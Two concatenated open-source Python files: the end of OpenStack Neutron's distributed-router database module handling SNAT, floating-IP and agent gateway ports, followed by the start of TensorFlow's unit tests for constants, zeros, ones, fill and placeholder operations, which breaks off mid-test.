if gw_port_id and gw_ports.get(gw_port_id):
rtr['gw_port'] = gw_ports[gw_port_id]
if 'enable_snat' in rtr[l3.EXTERNAL_GW_INFO]:
rtr['enable_snat'] = (
rtr[l3.EXTERNAL_GW_INFO]['enable_snat'])
binding = bindings.get(rtr['id'])
if not binding:
rtr['gw_port_host'] = None
LOG.debug('No snat is bound to router %s', rtr['id'])
continue
rtr['gw_port_host'] = binding.l3_agent.host
return routers
def _process_routers(self, context, routers):
routers_dict = {}
snat_intfs_by_router_id = self._get_snat_sync_interfaces(
context, [r['id'] for r in routers])
for router in routers:
routers_dict[router['id']] = router
if router['gw_port_id']:
snat_router_intfs = snat_intfs_by_router_id[router['id']]
LOG.debug("SNAT ports returned: %s ", snat_router_intfs)
router[l3_const.SNAT_ROUTER_INTF_KEY] = snat_router_intfs
return routers_dict
def _process_floating_ips_dvr(self, context, routers_dict,
floating_ips, host, agent):
fip_sync_interfaces = None
LOG.debug("FIP Agent : %s ", agent.id)
for floating_ip in floating_ips:
router = routers_dict.get(floating_ip['router_id'])
if router:
router_floatingips = router.get(l3_const.FLOATINGIP_KEY, [])
if router['distributed']:
if floating_ip.get('host', None) != host:
continue
LOG.debug("Floating IP host: %s", floating_ip['host'])
router_floatingips.append(floating_ip)
router[l3_const.FLOATINGIP_KEY] = router_floatingips
if not fip_sync_interfaces:
fip_sync_interfaces = self._get_fip_sync_interfaces(
context, agent.id)
LOG.debug("FIP Agent ports: %s", fip_sync_interfaces)
router[l3_const.FLOATINGIP_AGENT_INTF_KEY] = (
fip_sync_interfaces)
def _get_fip_sync_interfaces(self, context, fip_agent_id):
"""Query router interfaces that relate to list of router_ids."""
if not fip_agent_id:
return []
filters = {'device_id': [fip_agent_id],
'device_owner': [l3_const.DEVICE_OWNER_AGENT_GW]}
interfaces = self._core_plugin.get_ports(context.elevated(), filters)
LOG.debug("Return the FIP ports: %s ", interfaces)
return interfaces
def _get_dvr_sync_data(self, context, host, agent, router_ids=None,
active=None):
routers, interfaces, floating_ips = self._get_router_info_list(
context, router_ids=router_ids, active=active,
device_owners=l3_const.ROUTER_INTERFACE_OWNERS)
port_filter = {portbindings.HOST_ID: [host]}
ports = self._core_plugin.get_ports(context, port_filter)
port_dict = dict((port['id'], port) for port in ports)
# Add the port binding host to the floatingip dictionary
for fip in floating_ips:
vm_port = port_dict.get(fip['port_id'], None)
if vm_port:
fip['host'] = self._get_vm_port_hostid(context, fip['port_id'],
port=vm_port)
routers_dict = self._process_routers(context, routers)
self._process_floating_ips_dvr(context, routers_dict,
floating_ips, host, agent)
ports_to_populate = []
for router in routers_dict.values():
if router.get('gw_port'):
ports_to_populate.append(router['gw_port'])
if router.get(l3_const.FLOATINGIP_AGENT_INTF_KEY):
ports_to_populate += router[l3_const.FLOATINGIP_AGENT_INTF_KEY]
if router.get(l3_const.SNAT_ROUTER_INTF_KEY):
ports_to_populate += router[l3_const.SNAT_ROUTER_INTF_KEY]
ports_to_populate += interfaces
self._populate_subnets_for_ports(context, ports_to_populate)
self._process_interfaces(routers_dict, interfaces)
return list(routers_dict.values())
def _get_vm_port_hostid(self, context, port_id, port=None):
"""Return the portbinding host_id."""
vm_port_db = port or self._core_plugin.get_port(context, port_id)
device_owner = vm_port_db['device_owner'] if vm_port_db else ""
if (n_utils.is_dvr_serviced(device_owner) or
device_owner == l3_const.DEVICE_OWNER_AGENT_GW):
return vm_port_db[portbindings.HOST_ID]
def _get_agent_gw_ports_exist_for_network(
self, context, network_id, host, agent_id):
"""Return agent gw port if exist, or None otherwise."""
if not network_id:
LOG.debug("Network not specified")
return
filters = {
'network_id': [network_id],
'device_id': [agent_id],
'device_owner': [l3_const.DEVICE_OWNER_AGENT_GW]
}
ports = self._core_plugin.get_ports(context, filters)
if ports:
return ports[0]
def _get_router_ids(self, context):
"""Function to retrieve router IDs for a context without joins"""
query = self._model_query(context, l3_db.Router.id)
return [row[0] for row in query]
def delete_floatingip_agent_gateway_port(
self, context, host_id, ext_net_id):
"""Function to delete FIP gateway port with given ext_net_id."""
# delete any fip agent gw port
device_filter = {'device_owner': [l3_const.DEVICE_OWNER_AGENT_GW],
'network_id': [ext_net_id]}
ports = self._core_plugin.get_ports(context,
filters=device_filter)
for p in ports:
if not host_id or p[portbindings.HOST_ID] == host_id:
self._core_plugin.ipam.delete_port(context, p['id'])
if host_id:
return
def create_fip_agent_gw_port_if_not_exists(
self, context, network_id, host):
"""Function to return the FIP Agent GW port.
This function will create a FIP Agent GW port
if required. If the port already exists, it
will return the existing port and will not
create a new one.
"""
l3_agent_db = self._get_agent_by_type_and_host(
context, l3_const.AGENT_TYPE_L3, host)
if l3_agent_db:
LOG.debug("Agent ID exists: %s", l3_agent_db['id'])
f_port = self._get_agent_gw_ports_exist_for_network(
context, network_id, host, l3_agent_db['id'])
if not f_port:
LOG.info(_LI('Agent Gateway port does not exist,'
' so create one: %s'), f_port)
port_data = {'tenant_id': '',
'network_id': network_id,
'device_id': l3_agent_db['id'],
'device_owner': l3_const.DEVICE_OWNER_AGENT_GW,
'binding:host_id': host,
'admin_state_up': True,
'name': ''}
agent_port = p_utils.create_port(self._core_plugin, context,
{'port': port_data})
if agent_port:
self._populate_subnets_for_ports(context, [agent_port])
return agent_port
msg = _("Unable to create the Agent Gateway Port")
raise n_exc.BadRequest(resource='router', msg=msg)
else:
self._populate_subnets_for_ports(context, [f_port])
return f_port
def _get_snat_interface_ports_for_router(self, context, router_id):
"""Return all existing snat_router_interface ports."""
qry = context.session.query(l3_db.RouterPort)
qry = qry.filter_by(
router_id=router_id,
port_type=l3_const.DEVICE_OWNER_ROUTER_SNAT
)
ports = [self._core_plugin._make_port_dict(rp.port, None)
for rp in qry]
return ports
def _add_csnat_router_interface_port(
self, context, router, network_id, subnet_id, do_pop=True):
"""Add SNAT interface to the specified router and subnet."""
port_data = {'tenant_id': '',
'network_id': network_id,
'fixed_ips': [{'subnet_id': subnet_id}],
'device_id': router.id,
'device_owner': l3_const.DEVICE_OWNER_ROUTER_SNAT,
'admin_state_up': True,
'name': ''}
snat_port = p_utils.create_port(self._core_plugin, context,
{'port': port_data})
if not snat_port:
msg = _("Unable to create the SNAT Interface Port")
raise n_exc.BadRequest(resource='router', msg=msg)
with context.session.begin(subtransactions=True):
router_port = l3_db.RouterPort(
port_id=snat_port['id'],
router_id=router.id,
port_type=l3_const.DEVICE_OWNER_ROUTER_SNAT
)
context.session.add(router_port)
if do_pop:
return self._populate_subnets_for_ports(context, [snat_port])
return snat_port
def _create_snat_intf_ports_if_not_exists(self, context, router):
"""Function to return the snat interface port list.
This function will return the snat interface port list
if it exists. If the port does not exist it will create
new ports and then return the list.
"""
port_list = self._get_snat_interface_ports_for_router(
context, router.id)
if port_list:
self._populate_subnets_for_ports(context, port_list)
return port_list
port_list = []
int_ports = (
rp.port for rp in
router.attached_ports.filter_by(
port_type=l3_const.DEVICE_OWNER_DVR_INTERFACE
)
)
LOG.info(_LI('SNAT interface port list does not exist,'
' so create one: %s'), port_list)
for intf in int_ports:
if intf.fixed_ips:
# Passing the subnet for the port to make sure the IP's
# are assigned on the right subnet if multiple subnet
# exists
snat_port = self._add_csnat_router_interface_port(
context, router, intf['network_id'],
intf['fixed_ips'][0]['subnet_id'], do_pop=False)
port_list.append(snat_port)
if port_list:
self._populate_subnets_for_ports(context, port_list)
return port_list
def dvr_vmarp_table_update(self, context, port_dict, action):
"""Notify L3 agents of VM ARP table changes.
When a VM goes up or down, look for one DVR router on the port's
subnet, and send the VM's ARP details to all L3 agents hosting the
router.
"""
# Check this is a valid VM or service port
if not (n_utils.is_dvr_serviced(port_dict['device_owner']) and
port_dict['fixed_ips']):
return
ip_address = port_dict['fixed_ips'][0]['ip_address']
subnet = port_dict['fixed_ips'][0]['subnet_id']
filters = {'fixed_ips': {'subnet_id': [subnet]}}
ports = self._core_plugin.get_ports(context, filters=filters)
for port in ports:
if port['device_owner'] == l3_const.DEVICE_OWNER_DVR_INTERFACE:
router_id = port['device_id']
router_dict = self._get_router(context, router_id)
if router_dict.extra_attributes.distributed:
arp_table = {'ip_address': ip_address,
'mac_address': port_dict['mac_address'],
'subnet_id': subnet}
if action == "add":
notify_action = self.l3_rpc_notifier.add_arp_entry
elif action == "del":
notify_action = self.l3_rpc_notifier.del_arp_entry
notify_action(context, router_id, arp_table)
return
def delete_csnat_router_interface_ports(self, context,
router, subnet_id=None):
# Each csnat router interface port is associated
# with a subnet, so we need to pass the subnet id to
# delete the right ports.
# TODO(markmcclain): This is suboptimal but was left to reduce
# changeset size since it is late in cycle
ports = (
rp.port.id for rp in
router.attached_ports.filter_by(
port_type=l3_const.DEVICE_OWNER_ROUTER_SNAT)
if rp.port
)
c_snat_ports = self._core_plugin.get_ports(
context,
filters={'id': ports}
)
for p in c_snat_ports:
if subnet_id is None:
self._core_plugin.delete_port(context,
p['id'],
l3_port_check=False)
else:
if p['fixed_ips'][0]['subnet_id'] == subnet_id:
LOG.debug("Subnet matches: %s", subnet_id)
self._core_plugin.delete_port(context,
p['id'],
l3_port_check=False)
def is_distributed_router(router):
"""Return True if router to be handled is distributed."""
try:
# See if router is a DB object first
requested_router_type = router.extra_attributes.distributed
except AttributeError:
# if not, try to see if it is a request body
requested_router_type = router.get('distributed')
if attributes.is_attr_set(requested_router_type):
return requested_router_type
return cfg.CONF.router_distributed
| shahbazn/neutron | neutron/db/l3_dvr_db.py | Python | apache-2.0 | 31,701 |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for ConstantOp."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
from tensorflow.python.ops import array_ops
class ConstantTest(tf.test.TestCase):
def _testCpu(self, x):
np_ans = np.array(x)
with self.test_session(use_gpu=False):
tf_ans = tf.convert_to_tensor(x).eval()
if np_ans.dtype in [np.float32, np.float64, np.complex64, np.complex128]:
self.assertAllClose(np_ans, tf_ans)
else:
self.assertAllEqual(np_ans, tf_ans)
def _testGpu(self, x):
np_ans = np.array(x)
with self.test_session(use_gpu=True):
tf_ans = tf.convert_to_tensor(x).eval()
if np_ans.dtype in [np.float32, np.float64, np.complex64, np.complex128]:
self.assertAllClose(np_ans, tf_ans)
else:
self.assertAllEqual(np_ans, tf_ans)
def _testAll(self, x):
self._testCpu(x)
self._testGpu(x)
def testFloat(self):
self._testAll(np.arange(-15, 15).reshape([2, 3, 5]).astype(np.float32))
self._testAll(
np.random.normal(size=30).reshape([2, 3, 5]).astype(np.float32))
self._testAll(np.empty((2, 0, 5)).astype(np.float32))
def testDouble(self):
self._testAll(np.arange(-15, 15).reshape([2, 3, 5]).astype(np.float64))
self._testAll(
np.random.normal(size=30).reshape([2, 3, 5]).astype(np.float64))
self._testAll(np.empty((2, 0, 5)).astype(np.float64))
def testInt32(self):
self._testAll(np.arange(-15, 15).reshape([2, 3, 5]).astype(np.int32))
self._testAll(
(100 * np.random.normal(size=30)).reshape([2, 3, 5]).astype(np.int32))
self._testAll(np.empty((2, 0, 5)).astype(np.int32))
def testInt64(self):
self._testAll(np.arange(-15, 15).reshape([2, 3, 5]).astype(np.int64))
self._testAll(
(100 * np.random.normal(size=30)).reshape([2, 3, 5]).astype(np.int64))
self._testAll(np.empty((2, 0, 5)).astype(np.int64))
def testComplex64(self):
self._testAll(
np.complex(1, 2) * np.arange(-15, 15).reshape([2, 3, 5]).astype(
np.complex64))
self._testAll(np.complex(
1, 2) * np.random.normal(size=30).reshape([2, 3, 5]).astype(
np.complex64))
self._testAll(np.empty((2, 0, 5)).astype(np.complex64))
def testComplex128(self):
self._testAll(
np.complex(1, 2) * np.arange(-15, 15).reshape([2, 3, 5]).astype(
np.complex128))
self._testAll(np.complex(
1, 2) * np.random.normal(size=30).reshape([2, 3, 5]).astype(
np.complex128))
self._testAll(np.empty((2, 0, 5)).astype(np.complex128))
def testString(self):
self._testCpu(np.array([tf.compat.as_bytes(str(x))
for x in np.arange(-15, 15)]).reshape([2, 3, 5]))
self._testCpu(np.empty((2, 0, 5)).astype(np.str_))
def testStringWithNulls(self):
with self.test_session():
val = tf.convert_to_tensor(b"\0\0\0\0").eval()
self.assertEqual(len(val), 4)
self.assertEqual(val, b"\0\0\0\0")
with self.test_session():
val = tf.convert_to_tensor(b"xx\0xx").eval()
self.assertEqual(len(val), 5)
self.assertAllEqual(val, b"xx\0xx")
nested = [[b"\0\0\0\0", b"xx\0xx"], [b"\0_\0_\0_\0", b"\0"]]
with self.test_session():
val = tf.convert_to_tensor(nested).eval()
# NOTE(mrry): Do not use assertAllEqual, because it converts nested to a
# numpy array, which loses the null terminators.
self.assertEqual(val.tolist(), nested)
def testExplicitShapeNumPy(self):
with tf.Graph().as_default():
c = tf.constant(
np.arange(-15, 15).reshape([2, 3, 5]).astype(np.float32),
shape=[2, 3, 5])
self.assertEqual(c.get_shape(), [2, 3, 5])
def testImplicitShapeNumPy(self):
with tf.Graph().as_default():
c = tf.constant(
np.arange(-15, 15).reshape([2, 3, 5]).astype(np.float32))
self.assertEqual(c.get_shape(), [2, 3, 5])
def testExplicitShapeList(self):
with tf.Graph().as_default():
c = tf.constant([1, 2, 3, 4, 5, 6, 7], shape=[7])
self.assertEqual(c.get_shape(), [7])
def testImplicitShapeList(self):
with tf.Graph().as_default():
c = tf.constant([1, 2, 3, 4, 5, 6, 7])
self.assertEqual(c.get_shape(), [7])
def testExplicitShapeNumber(self):
with tf.Graph().as_default():
c = tf.constant(1, shape=[1])
self.assertEqual(c.get_shape(), [1])
def testImplicitShapeNumber(self):
with tf.Graph().as_default():
c = tf.constant(1)
self.assertEqual(c.get_shape(), [])
def testShapeInconsistent(self):
with tf.Graph().as_default():
c = tf.constant([1, 2, 3, 4, 5, 6, 7], shape=[10])
self.assertEqual(c.get_shape(), [10])
# pylint: disable=g-long-lambda
def testShapeWrong(self):
with tf.Graph().as_default():
with self.assertRaisesWithPredicateMatch(
ValueError,
lambda e: ("Too many elements provided. Needed at most 5, "
"but received 7" == str(e))):
tf.constant([1, 2, 3, 4, 5, 6, 7], shape=[5])
# pylint: enable=g-long-lambda
def testTooLargeConstant(self):
with tf.Graph().as_default():
large_array = np.zeros((512, 1024, 1024), dtype=np.float32)
with self.assertRaisesRegexp(
ValueError,
"Cannot create a tensor proto whose content is larger than 2GB."):
c = tf.constant(large_array)
def testTooLargeGraph(self):
with tf.Graph().as_default() as g:
large_array = np.zeros((256, 1024, 1024), dtype=np.float32)
c = tf.constant(large_array)
d = tf.constant(large_array)
with self.assertRaisesRegexp(
ValueError, "GraphDef cannot be larger than 2GB."):
g.as_graph_def()
def testSparseValuesRaiseErrors(self):
with self.assertRaisesRegexp(ValueError,
"setting an array element with a sequence"):
c = tf.constant([[1, 2], [3]], dtype=tf.int32)
with self.assertRaisesRegexp(ValueError, "must be a dense"):
c = tf.constant([[1, 2], [3]])
with self.assertRaisesRegexp(ValueError, "must be a dense"):
c = tf.constant([[1, 2], [3], [4, 5]])
class AsTensorTest(tf.test.TestCase):
def testAsTensorForTensorInput(self):
with tf.Graph().as_default():
t = tf.constant(10.0)
x = tf.convert_to_tensor(t)
self.assertIs(t, x)
def testAsTensorForNonTensorInput(self):
with tf.Graph().as_default():
x = tf.convert_to_tensor(10.0)
self.assertTrue(isinstance(x, tf.Tensor))
def testAsTensorForShapeInput(self):
with self.test_session():
x = tf.convert_to_tensor(tf.TensorShape([]))
self.assertEqual(tf.int32, x.dtype)
self.assertAllEqual([], x.eval())
x = tf.convert_to_tensor(tf.TensorShape([1, 2, 3]))
self.assertEqual(tf.int32, x.dtype)
self.assertAllEqual([1, 2, 3], x.eval())
x = tf.convert_to_tensor(tf.TensorShape([1, 2, 3]), dtype=tf.int64)
self.assertEqual(tf.int64, x.dtype)
self.assertAllEqual([1, 2, 3], x.eval())
x = tf.reshape(tf.zeros([6]), tf.TensorShape([2, 3]))
self.assertAllEqual([[0.0, 0.0, 0.0], [0.0, 0.0, 0.0]], x.eval())
with self.assertRaisesRegexp(ValueError, "partially known"):
tf.convert_to_tensor(tf.TensorShape(None))
with self.assertRaisesRegexp(ValueError, "partially known"):
tf.convert_to_tensor(tf.TensorShape([1, None, 64]))
with self.assertRaises(TypeError):
tf.convert_to_tensor(tf.TensorShape([1, 2, 3]), dtype=tf.float32)
def testAsTensorForDimensionInput(self):
with self.test_session():
x = tf.convert_to_tensor(tf.TensorShape([1, 2, 3])[1])
self.assertEqual(tf.int32, x.dtype)
self.assertAllEqual(2, x.eval())
x = tf.convert_to_tensor(tf.TensorShape([1, 2, 3])[1], dtype=tf.int64)
self.assertEqual(tf.int64, x.dtype)
self.assertAllEqual(2, x.eval())
with self.assertRaisesRegexp(ValueError, "unknown Dimension"):
tf.convert_to_tensor(tf.TensorShape(None)[1])
with self.assertRaisesRegexp(ValueError, "unknown Dimension"):
tf.convert_to_tensor(tf.TensorShape([1, None, 64])[1])
with self.assertRaises(TypeError):
tf.convert_to_tensor(tf.TensorShape([1, 2, 3])[1], dtype=tf.float32)
class IdentityOpTest(tf.test.TestCase):
def testIdTensor(self):
with tf.Graph().as_default():
x = tf.constant(2.0, shape=[6], name="input")
id_op = tf.identity(x, name="id")
self.assertTrue(isinstance(id_op.op.inputs[0], tf.Tensor))
self.assertProtoEquals(
"name: 'id' op: 'Identity' input: 'input' "
"attr { key: 'T' value { type: DT_FLOAT } }", id_op.op.node_def)
class ZerosTest(tf.test.TestCase):
def _Zeros(self, shape):
with self.test_session():
ret = tf.zeros(shape)
self.assertEqual(shape, ret.get_shape())
return ret.eval()
def testConst(self):
self.assertTrue(np.array_equal(self._Zeros([2, 3]), np.array([[0] * 3] *
2)))
def testScalar(self):
self.assertEqual(0, self._Zeros([]))
self.assertEqual(0, self._Zeros(()))
with self.test_session():
scalar = tf.zeros(tf.constant([], dtype=tf.int32))
self.assertEqual(0, scalar.eval())
def testDynamicSizes(self):
np_ans = np.array([[0] * 3] * 2)
with self.test_session():
# Creates a tensor of 2 x 3.
d = tf.fill([2, 3], 12., name="fill")
# Constructs a tensor of zeros of the same dimensions as "d".
z = tf.zeros(tf.shape(d))
out = z.eval()
self.assertAllEqual(np_ans, out)
self.assertShapeEqual(np_ans, d)
self.assertShapeEqual(np_ans, z)
def testDtype(self):
with self.test_session():
d = tf.fill([2, 3], 12., name="fill")
self.assertEqual(d.get_shape(), [2, 3])
# Test default type for both constant size and dynamic size
z = tf.zeros([2, 3])
self.assertEqual(z.dtype, tf.float32)
self.assertEqual([2, 3], z.get_shape())
self.assertAllEqual(z.eval(), np.zeros([2, 3]))
z = tf.zeros(tf.shape(d))
self.assertEqual(z.dtype, tf.float32)
self.assertEqual([2, 3], z.get_shape())
self.assertAllEqual(z.eval(), np.zeros([2, 3]))
# Test explicit type control
for dtype in [tf.float32, tf.float64, tf.int32,
tf.uint8, tf.int16, tf.int8,
tf.complex64, tf.complex128, tf.int64, tf.bool]:
z = tf.zeros([2, 3], dtype=dtype)
self.assertEqual(z.dtype, dtype)
self.assertEqual([2, 3], z.get_shape())
self.assertAllEqual(z.eval(), np.zeros([2, 3]))
z = tf.zeros(tf.shape(d), dtype=dtype)
self.assertEqual(z.dtype, dtype)
self.assertEqual([2, 3], z.get_shape())
self.assertAllEqual(z.eval(), np.zeros([2, 3]))
class ZerosLikeTest(tf.test.TestCase):
def _compareZeros(self, dtype, use_gpu):
with self.test_session(use_gpu=False):
# Creates a tensor of non-zero values with shape 2 x 3.
numpy_dtype = dtype.as_numpy_dtype
d = tf.constant(np.ones((2, 3), dtype=numpy_dtype), dtype=dtype)
# Constructs a tensor of zeros of the same dimensions and type as "d".
z_var = tf.zeros_like(d)
# Test that the type is correct
self.assertEqual(z_var.dtype, dtype)
z_value = z_var.eval()
# Test that the value is correct
self.assertTrue(np.array_equal(z_value, np.array([[0] * 3] * 2)))
self.assertEqual([2, 3], z_var.get_shape())
def testZerosLikeCPU(self):
for dtype in [tf.float32, tf.float64, tf.int32, tf.uint8, tf.int16, tf.int8,
tf.complex64, tf.complex128, tf.int64]:
self._compareZeros(dtype, False)
def testZerosLikeGPU(self):
for dtype in [tf.float32, tf.float64, tf.int32]:
self._compareZeros(dtype, True)
def testZerosLikePartialShape(self):
d = tf.placeholder(tf.float32, shape=[None, 4, None])
z = tf.zeros_like(d)
self.assertEqual(d.get_shape().as_list(), z.get_shape().as_list())
def testZerosLikeDtype(self):
# Make sure zeros_like works even for dtypes that cannot be cast between
with self.test_session():
shape = (3, 5)
dtypes = np.float32, np.complex64
for in_type in dtypes:
x = np.arange(15).astype(in_type).reshape(*shape)
for out_type in dtypes:
y = tf.zeros_like(x, dtype=out_type).eval()
self.assertEqual(y.dtype, out_type)
self.assertEqual(y.shape, shape)
self.assertAllEqual(y, np.zeros(shape, dtype=out_type))
class OnesTest(tf.test.TestCase):
def _Ones(self, shape):
with self.test_session():
ret = tf.ones(shape)
self.assertEqual(shape, ret.get_shape())
return ret.eval()
def testConst(self):
self.assertTrue(np.array_equal(self._Ones([2, 3]), np.array([[1] * 3] * 2)))
def testScalar(self):
self.assertEqual(1, self._Ones([]))
self.assertEqual(1, self._Ones(()))
with self.test_session():
scalar = tf.ones(tf.constant([], dtype=tf.int32))
self.assertEqual(1, scalar.eval())
def testDynamicSizes(self):
np_ans = np.array([[1] * 3] * 2)
with self.test_session():
# Creates a tensor of 2 x 3.
d = tf.fill([2, 3], 12., name="fill")
# Constructs a tensor of ones of the same dimensions as "d".
z = tf.ones(tf.shape(d))
out = z.eval()
self.assertAllEqual(np_ans, out)
self.assertShapeEqual(np_ans, d)
self.assertShapeEqual(np_ans, z)
def testAutoPack(self):
with self.test_session():
h = tf.placeholder(tf.int32, shape=[])
w = tf.placeholder(tf.int32, shape=[])
z = tf.ones([h, w])
out = z.eval(feed_dict={h: 4, w: 16})
self.assertAllEqual(out, np.array([[1] * 16] * 4))
def testDtype(self):
with self.test_session():
d = tf.fill([2, 3], 12., name="fill")
self.assertEqual(d.get_shape(), [2, 3])
# Test default type for both constant size and dynamic size
z = tf.ones([2, 3])
self.assertEqual(z.dtype, tf.float32)
self.assertEqual([2, 3], z.get_shape())
self.assertAllEqual(z.eval(), np.ones([2, 3]))
z = tf.ones(tf.shape(d))
self.assertEqual(z.dtype, tf.float32)
self.assertEqual([2, 3], z.get_shape())
self.assertAllEqual(z.eval(), np.ones([2, 3]))
# Test explicit type control
for dtype in (tf.float32, tf.float64, tf.int32,
tf.uint8, tf.int16, tf.int8,
tf.complex64, tf.complex128, tf.int64, tf.bool):
z = tf.ones([2, 3], dtype=dtype)
self.assertEqual(z.dtype, dtype)
self.assertEqual([2, 3], z.get_shape())
self.assertAllEqual(z.eval(), np.ones([2, 3]))
z = tf.ones(tf.shape(d), dtype=dtype)
self.assertEqual(z.dtype, dtype)
self.assertEqual([2, 3], z.get_shape())
self.assertAllEqual(z.eval(), np.ones([2, 3]))
class OnesLikeTest(tf.test.TestCase):
def testOnesLike(self):
for dtype in [tf.float32, tf.float64, tf.int32,
tf.uint8, tf.int16, tf.int8,
tf.complex64, tf.complex128, tf.int64]:
numpy_dtype = dtype.as_numpy_dtype
with self.test_session():
# Creates a tensor of non-zero values with shape 2 x 3.
d = tf.constant(np.ones((2, 3), dtype=numpy_dtype), dtype=dtype)
# Constructs a tensor of zeros of the same dimensions and type as "d".
z_var = tf.ones_like(d)
# Test that the type is correct
self.assertEqual(z_var.dtype, dtype)
z_value = z_var.eval()
# Test that the value is correct
self.assertTrue(np.array_equal(z_value, np.array([[1] * 3] * 2)))
self.assertEqual([2, 3], z_var.get_shape())
def testOnesLikePartialShape(self):
d = tf.placeholder(tf.float32, shape=[None, 4, None])
z = tf.ones_like(d)
self.assertEqual(d.get_shape().as_list(), z.get_shape().as_list())
class FillTest(tf.test.TestCase):
def _compare(self, dims, val, np_ans, use_gpu):
with self.test_session(use_gpu=use_gpu):
tf_ans = tf.fill(dims, val, name="fill")
out = tf_ans.eval()
self.assertAllClose(np_ans, out)
# Fill does not set the shape.
# self.assertShapeEqual(np_ans, tf_ans)
def _compareAll(self, dims, val, np_ans):
self._compare(dims, val, np_ans, False)
self._compare(dims, val, np_ans, True)
def testFillFloat(self):
np_ans = np.array([[3.1415] * 3] * 2).astype(np.float32)
self._compareAll([2, 3], np_ans[0][0], np_ans)
def testFillDouble(self):
np_ans = np.array([[3.1415] * 3] * 2).astype(np.float64)
self._compareAll([2, 3], np_ans[0][0], np_ans)
def testFillInt32(self):
np_ans = np.array([[42] * 3] * 2).astype(np.int32)
self._compareAll([2, 3], np_ans[0][0], np_ans)
def testFillInt64(self):
np_ans = np.array([[-42] * 3] * 2).astype(np.int64)
self._compareAll([2, 3], np_ans[0][0], np_ans)
def testFillComplex64(self):
np_ans = np.array([[0.15] * 3] * 2).astype(np.complex64)
self._compare([2, 3], np_ans[0][0], np_ans, use_gpu=False)
def testFillComplex128(self):
np_ans = np.array([[0.15] * 3] * 2).astype(np.complex128)
self._compare([2, 3], np_ans[0][0], np_ans, use_gpu=False)
def testFillString(self):
np_ans = np.array([[b"yolo"] * 3] * 2)
with self.test_session(use_gpu=False):
tf_ans = tf.fill([2, 3], np_ans[0][0], name="fill").eval()
self.assertAllEqual(np_ans, tf_ans)
def testFillNegative(self):
with self.test_session():
for shape in (-1,), (2, -1), (-1, 2):
with self.assertRaises(ValueError):
tf.fill(shape, 7)
# Using a placeholder so this won't be caught in Python.
dims = tf.placeholder(tf.int32)
fill_t = tf.fill(dims, 3.0)
for shape in (-1,), (2, -1), (-1, 2):
with self.assertRaises(tf.errors.InvalidArgumentError):
fill_t.eval({dims: shape})
def testShapeFunctionEdgeCases(self):
# Non-vector dimensions.
with self.assertRaises(ValueError):
tf.fill([[0, 1], [2, 3]], 1.0)
# Non-scalar value.
with self.assertRaises(ValueError):
tf.fill([3, 2], [1.0, 2.0])
# Partial dimension information.
f = tf.fill(
tf.placeholder(tf.int32, shape=(4,)), 3.0)
self.assertEqual([None, None, None, None], f.get_shape().as_list())
f = tf.fill([tf.placeholder(tf.int32, shape=()), 17], 1.0)
self.assertEqual([None, 17], f.get_shape().as_list())
def testGradient(self):
with self.test_session():
in_v = tf.constant(5.0)
out_shape = [3, 2]
out_filled = tf.fill(out_shape, in_v)
err = tf.test.compute_gradient_error(in_v, [],
out_filled, out_shape)
self.assertLess(err, 1e-3)
class PlaceholderTest(tf.test.TestCase):
def testDtype(self):
with self.test_session():
p = tf.placeholder(tf.float32, name="p")
p_identity = tf.identity(p)
feed_array = np.random.rand(10, 10)
self.assertAllClose(p_identity.eval(feed_dict={p: feed_array}),
feed_array)
with self.assertRaisesOpError(
"must feed a value for placeholder tensor 'p' with dtype float"):
p_identity.eval()
def testShape(self):
with self.test_session():
p = tf.placeholder(tf.float32, shape=(10, 10), name="p")
p_identity = tf.identity(p)
feed_array = np.random.rand(10, 10)
self.assertAllClose(p_identity.eval(feed_dict={p: feed_array}),
feed_array)
with self.assertRaisesOpError(
"must feed a value for placeholder tensor 'p' with dtype float and "
r"shape \[10,10\]"):
p_identity.eval()
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: "Cannot feed value of shape" in str(e)):
p_identity.eval(feed_dict={p: feed_array[:5, :5]})
def testPartialShape(self):
with self.test_session():
p = tf.placeholder(tf.float32, shape=[None, 3], name="p")
p_identity = tf.identity(p)
feed_array = np.random.rand(10, 3)
self.assertAllClose(p_identity.eval(feed_dict={p: feed_array}),
feed_array)
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: "Cannot feed value of shape" in str(e)):
p_identity.eval(feed_dict={p: feed_array[:5, :2]})
def testControlDependency(self):
with self.test_session():
p = tf.placeholder(tf.int32, shape=[], name="p")
with tf.control_dependencies([p]):
c = tf.constant(5, tf.int32)
d = tf.mul(p, c)
self.assertEqual(10, d.eval(feed_dict={p: 2}))
def testBadShape(self):
with self.assertRaises(ValueError):
tf.placeholder(tf.float32, shape=(-1, 10))
def testTensorStr(self):
a = tf.placeholder(tf.float32, name="a")
self.assertEqual("<tf.Tensor 'a:0' shape=<unknown> dtype=float32>", repr(a))
b = tf.placeholder(tf.int32, shape=(32, 40), name="b")
self.assertEqual(
"<tf.Tensor 'b:0' shape=(32, 40) dtype=int32>",
repr(b))
c = tf.placeholder(tf.qint32, shape=(32, None, 2), name="c")
self.assertEqual(
"<tf.Tensor 'c:0' shape=(32, ?, 2) dtype=qint32>",
repr(c))
class PlaceholderV2Test(tf.test.TestCase):
def testDtype(self):
with self.test_session():
p = array_ops.placeholder_v2(tf.float32, shape=None, name="p")
p_identity = tf.identity(p)
feed_array = np.random.rand(10, 10)
self.assertAllClose(
p_identity.eval(feed_dict={
p: feed_array
}), feed_array)
with self.assertRaisesOpError(
"must feed a value for placeholder tensor 'p' with dtype float"):
p_identity.eval()
def testShape(self):
with self.test_session():
p = array_ops.placeholder_v2(tf.float32, shape=(10, 10), name="p")
p_identity = tf.identity(p)
feed_array = np.random.rand(10, 10)
self.assertAllClose(
p_identity.eval(feed_dict={
p: feed_array
}), feed_array)
with self.assertRaisesOpError(
"must feed a value for placeholder tensor 'p' with dtype float and "
r"shape \[10,10\]"):
p_identity.eval()
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: "Cannot feed value of shape" in str(e)):
p_identity.eval(feed_dict={p: feed_array[:5, :5]})
def testUnknownShape(self):
with self.test_session():
